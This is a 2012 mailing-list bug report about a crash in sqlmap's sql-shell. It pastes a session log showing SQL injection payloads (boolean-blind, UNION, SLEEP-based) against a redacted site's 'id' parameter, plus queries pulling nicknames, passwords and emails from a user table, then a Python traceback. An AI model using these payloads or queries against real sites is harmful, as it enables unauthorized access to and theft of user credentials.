[sqlmap-users] Bug Found in sql-shell!
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Bug Found in sql-shell!
|
From: Marco M. <mm...@gm...> - 2012-04-04 20:19:07
|
[22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[22:15:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12' AND 7690=7690 AND 'coUR'='coUR
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=12' UNION ALL SELECT NULL,
CONCAT(0x3a6e617a3a,0x61476a577a70535
36676,0x3a6f61623a)# AND 'vhgF'='vhgF
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
---
[22:15:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
ENTER
sql-shell> select nick, pws from utenti
[22:15:56] [INFO] fetching SQL SELECT statement query output: 'select nick,
pws
from utenti'
select nick, pws from utenti: 'None'
sql-shell> select nick, pws from utenti
[22:16:08] [INFO] fetching SQL SELECT statement query output: 'select nick,
pws
from utenti'
select nick, pws from utenti: 'None'
sql-shell> select nick, pws, mail from utenti
[22:16:32] [INFO] fetching SQL SELECT statement query output: 'select nick,
pws,
mail from utenti'
[22:16:32] [INFO] the SQL query provided has more than a field. sqlmap will
now
unpack it into distinct queries to be able to retrieve the output even if
we are
going blind
[22:16:32] [INFO] resumed: 4
the SQL query provided can return 4 entries. How many entries do you want
to ret
rieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[22:16:36] [INFO] retrieving the length of query output
[22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run
with
the latest development version from the Subversion repository. If the
exception
persists, please send by e-mail to sql...@li... the
follo
wing text and any information required to reproduce the bug. The developers
will
try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u
*****************************
*********************** --sql-shell --threads=5
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
start()
File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, in
star
t
action()
File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in
action
conf.dbmsHandler.sqlShell()
File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2451,
in s
qlShell
output = self.sqlQuery(query)
File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2397,
in s
qlQuery
output = inject.getValue(query, fromUser=True)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in
getValue
value = __goInferenceProxy(query, fromUser, expected, batch, unpack,
charset
Type, firstChar, lastChar, dump)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in
__goInferen
ceProxy
output = __goInferenceFields(expression, expressionFields,
expressionFieldsL
ist, payload, expected, num, charsetType=charsetType, firstChar=firstChar,
lastC
har=lastChar, dump=dump)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in
__goInferen
ceFields
output = __goInference(payload, expressionReplaced, charsetType,
firstChar,
lastChar, dump)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in
__goInferenc
e
_, length, _ = queryOutputLength(expression, payload)
File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in
queryOutputLen
gth
count, length = bisection(payload, lengthExprUnescaped, expected=
EXPECTED.IN
T, charsetType=CHARSET_TYPE.DIGITS)
TypeError: bisection() got an unexpected keyword argument 'expected'
[*] shutting down at 22:16:36
|
